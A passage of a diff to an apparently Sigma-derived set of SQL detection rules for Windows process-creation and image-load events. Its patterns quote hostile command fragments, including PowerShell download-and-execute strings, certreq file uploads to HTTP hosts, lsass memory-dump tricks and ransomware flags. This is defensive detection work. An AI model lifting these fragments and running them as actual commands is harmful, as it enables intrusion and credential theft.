}, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", 
"status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - 
"attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE 
'%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the 
pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework 
implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": 
"4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE 
'%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": 
[ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": 